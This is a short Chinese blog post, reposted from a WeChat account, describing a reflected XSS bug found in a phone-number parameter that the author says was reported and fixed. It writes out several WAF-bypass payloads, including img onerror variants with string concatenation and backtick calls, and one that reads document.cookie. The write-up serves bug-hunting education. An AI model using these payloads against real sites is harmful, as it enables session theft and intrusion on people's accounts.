记一次简单的漏洞挖掘

admin 2023年5月14日21:35:23评论31 views字数 678阅读2分15秒阅读模式

漏洞已提交修复,打了厚码给大家分享一下

在测试一个功能点的时候,他传递一个参数sm,这个sm参数是个手机号

记一次简单的漏洞挖掘

猜测这个参数可能会在页面上直接输出,那就整个html的标签进去试试,看他解不解析

记一次简单的漏洞挖掘

一般我不会使用<script>alert(1)</script>,这样的xss百年一遇,那个简直就是可遇不可求

看到这儿,很明显,页面上他是解析的,那么再试试他的属性值呢

记一次简单的漏洞挖掘

属性值也是能解析的,没有被过滤,我们就可以尝试构造这样的pocbypass

<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==" />1</a>

当然,我不想写的那么长(懒得写),这里就用img标签尝试构造一个常见的poc

记一次简单的漏洞挖掘

这是因为存在一个waf,那就尝试poc bypass

经过反复测试,在html标签中,如果存在关键字onerror=alert(1)会被这个waf匹配直接拦截,那么我们就可以尝试构造bypass后的poc

<img src=1 onerror="alert%20(1)"/>

记一次简单的漏洞挖掘

当然 方法不唯一,你还可以拆开之后拼一块儿

<img src=1 onerror=top['ale'+'rt'](1)>

记一次简单的漏洞挖掘

或者替换括号

<img src=1 onerror="alert`1`">

记一次简单的漏洞挖掘

然后我试了一下,单独的alert是不会被拦截的,那么就有poc

<img src=1 onerror="window['alert'](document['cookie'])"/>

记一次简单的漏洞挖掘

bypass方法很多,这里就不一一例举了

原文始发于微信公众号(深夜笔记本):记一次简单的漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月14日21:35:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次简单的漏洞挖掘http://cn-sec.com/archives/1732443.html

发表评论

匿名网友 填写信息